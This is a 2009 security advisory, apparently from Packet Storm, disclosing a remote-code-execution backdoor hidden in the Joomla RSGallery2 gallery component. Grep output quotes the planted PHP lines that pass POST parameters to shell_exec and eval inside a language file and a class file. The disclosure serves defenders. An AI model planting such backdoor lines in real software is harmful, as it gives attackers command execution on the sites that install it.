exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla RSGallery2 Backdoor

Joomla RSGallery2 Backdoor
Posted May 27, 2009
Authored by Jan van Niekerk

The RSGallery2 component versions 1.14.x and 2.x for Joomla have a backdoor embedded in them.

tags | exploit
SHA-256 | 9cae569a242131944c0f96ed7d35c00a85909392418205a9af4a7a6e1210358a

Joomla RSGallery2 Backdoor

Change Mirror Download
Vulnerability:
Remote code execution back door(s)

Software:
RSGallery2 - Gallery Extension for Joomla!
We are currently working on a new website. All files are still available at
the JoomlaCode project page.

Severity:
Not a big deal. Joomla components contain all sorts of obfuscated junk all
the time. Who cares what it does?

URLs:
http://rsgallery2.net/
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip
http://joomlacode.org/gf/download/frsrelease/7791/36662/com_rsgallery2_2.0.0b1.zip

Joomlacode.org says, about these releases:
RSGallery2 1.14.3 Security Release
Jonah Braun
2008-02-13
This is an updated production alpha containing a low threat security fix. If
you use commenting you should upgrade. An option to show/hide the Search box
has also been added. See the official site for downloads and support:
http://rsgallery2.net/

RSGallery2 2.0.0b1 released
John Caprez
2008-06-23
This is the first version of RSGallery2 that runs in Joomla 1.5 native mode.

Special thanks goes to all the translators providing the updated language
files and the testers of the nightly builds.
Download it and enjoy. Feel free to report any bugs or problems in the forum
at the RSGallery2 main web site

Vendor notified:
I tried. Not very hard though. joomlacode doesn't seem to have a security
contact and links to joomla.org as if they are the same crowd. I'm sending
a BCC to the given address for Jonah Braun though. I'll send it to bugtraq,
and they will sit on it for a few hours.
http://developer.joomla.org/security.html
Huh? Do I need more coffee, or does this page say to contact them using
the details at this page? So you do that, and it says ... no wait,
infloop. Oh wait, there is a contact form. Filled something in. Blah.

Vulnerability:

% wget \
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip

% unzip com_rsgallery2_legacy_1.14.3.zip

% egrep -r '(eval|exec).*POST' .

./language/english-utf8.php: $result =
shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
./language/english-utf8.php: $result = shell_exec($_POST['cmd'] . "
2>&1");
./includes/rsgallery.class.php:$out = execute($_POST['cmd']);
./includes/rsgallery.class.php:eval($_POST['php']);
./includes/rsgallery.class.php:$out = execute($_POST['alias']);

There's other fun obfuscated javascript hiding in 'eval's'.

Ditto version 2

nuf sed &:-)


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close